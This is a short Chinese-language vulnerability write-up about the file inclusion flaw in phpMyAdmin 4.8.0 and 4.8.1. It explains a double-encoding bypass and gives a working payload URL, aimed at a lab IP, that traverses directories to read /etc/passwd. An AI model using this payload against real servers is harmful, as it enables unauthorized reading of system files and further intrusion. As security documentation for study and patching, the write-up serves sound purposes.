漏洞简介
index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。该漏洞需要登录进phpmyadmin页面才能利用。
漏洞影响
phpMyAdmin 4.8.0、4.8.1版本
漏洞分析
https://blog.csdn.net/qq_33020901/article/details/80829269
漏洞利用
访问存在漏洞版本的页面
payload构造如下:
http://192.168.30.128:8080/index.php?target=db_sql.php%253f/../../../../../../etc/passwd
至于中间的/../就是跳转上一级目录用的,因为你不知道当前所处的位置是几层目录,所以加的越多越好,当然一般五六个就好了。。
可以看到成功读取到/etc/passwd文件内容。